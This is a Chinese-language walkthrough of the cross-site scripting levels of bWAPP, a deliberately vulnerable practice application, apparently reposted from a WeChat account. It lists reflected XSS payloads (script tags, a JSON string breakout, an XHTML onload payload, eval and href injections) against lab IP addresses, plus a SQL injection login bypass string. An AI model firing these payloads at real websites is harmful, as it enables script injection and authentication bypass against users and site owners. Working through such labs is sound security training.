Bwapp漏洞平台答案全解-A3(第一篇)

A3 - Cross-Site Scripting (XSS)

*****************跨站脚本******************

跨站的终极思路:输入的东西在页面有回显

3.1-XSS – Reflected (GET)

在用户名输入:密码随便输入

<script>alert(/xss/)</script>

出现一次XSS

在用户名和密码出都输入:

<script>alert(/xss/)</script>

出现两个XSS

3.2-XSS - Reflected (POST)

在用户名输入:密码随便输入

<script>alert(/xss/)</script>

出现一次XSS

在用户名和密码出都输入:

<script>alert(/xss/)</script>

出现两个XSS

3.3-XSS - Reflected (JSON)

漏洞URL:

http://192.168.0.155/bWAPP/xss_json.php?title=';alert(1)//&action=search

3.4-XSS - Reflected (AJAX/JSON)

使用burp抓包,

http://172.16.0.225/bWAPP/xss_ajax_2-2.php?title=<script>alert(1)</script>

3.5-XSS - Reflected (AJAX/XML)

http://172.16.0.225/bWAPP/xss_ajax_1-2.php?title=/bWAPP/xss_ajax_1-2.php?title=<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>

xmlns是XML Namespaces的缩写

当加载网站的时候执行alert(1)

3.6-XSS - Reflected (Back Button)

本身没有XSS,但是在Referer字段中有

漏洞URL:http://192.168.0.155/bWAPP/xss_back_button.php

点击GO back之后会有

-3.7-XSS - Reflected (Custom Header)

这个实在是没找到跨站点在哪里,找的我尴尬症都犯了,全程抓包没发现,可疑点在这个位置,有玩出来的老铁麻烦留言一下,谢谢

3.8-XSS - Reflected (Eval)

http://172.16.0.225/bWAPP/xss_eval.php?date=alert(1)

直接在evla函数里面,可以直接alert

3.9-XSS - Reflected (HREF)

漏洞URL:

http://172.16.0.225/bWAPP/xss_href-2.php?name=/><script>alert(1)</script>&action=vote

前面的a标签要闭合掉

-3.10-XSS - Reflected (Login Form)

这个没玩出来

补充:这边有个万能密码,但是好像跟XSS没啥关系啊,这个怎么玩很尴尬

' or '1'='1

原文发布于微信公众号 - 网络安全社区悦信安(yuexin_an)

原文发表时间:2017-07-25

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏小古哥的博客园

gulp的安装和使用

安装nodejs -> 全局安装gulp -> 项目安装gulp以及gulp插件 -> 配置gulpfile.js -> 运行任务 1、去nodejs官网安装n...

29350
来自专栏PhpZendo

HTML 5 Web Workers 的基本信息

要将有趣的应用(例如从侧重服务器端的实施)移植到客户端 JavaScript,存在很多制约瓶颈。其中包括浏览器兼容性、静态类型、可访问性和性能。幸运的是,随着浏...

10810
来自专栏电光石火

eclipse SWT Designer 插件

 先下swt zip包,地址:http://www.eclipse.org/windowbuilder/download.php 1、选择自己eclips...

42860
来自专栏IMWeb前端团队

Web自动化之Headless Chrome开发工具库

本文作者:IMWeb 钌子_rawbin 原文出处:IMWeb社区 未经同意,禁止转载 命令行运行Headless Chrome Chrome 安装(...

24060
来自专栏腾讯NEXT学位

JavaScript全栈开发-工具篇(下)

? 文章目录 ? 四、测试工具 1. 单元测试 单元测试(unit testing),是指对软件中的最小可测试单元进行检查和验证。常见的单元测试工具有: * ...

13820
来自专栏一只程序汪的自我修养

VS快捷键

30950
来自专栏落影的专栏

真机的代码覆盖率测试

代码覆盖率测试 以前虽然写过单元测试,但很少监测测试的完整程度,测试用例也经常存在重复的情况。这次在测试的要求下开始接入代码覆盖率测试。什么是代码覆盖率?就是测...

43550
来自专栏沃趣科技

那些年前端跨过的域

同源策略(same-origin policy) 最初是由 Netspace 公司在 1995 年引入浏览器的一种安全策略,现在所有的浏览器都遵守同源策略,它是...

43960
来自专栏青玉伏案

iOS逆向工程之Hopper+LLDB调试第三方App

LLDB是Low Level Debugger的简称,在iOS开发的调试中LLDB是经常使用的,LLDB是Xcode内置的动态调试工具。使用LLDB可以动态的调...

46090
来自专栏QQ音乐技术团队的专栏

electron 构建跨平台桌面应用

昨日(2016.09.13)本文发表后,获得了一定的阅读和转发量,但经部分网友反馈和仔细审核后发现,在与 NW.js 对比的环节,言辞欠妥,且数据的真实性有待考...

1.2K110

扫码关注云+社区

领取腾讯云代金券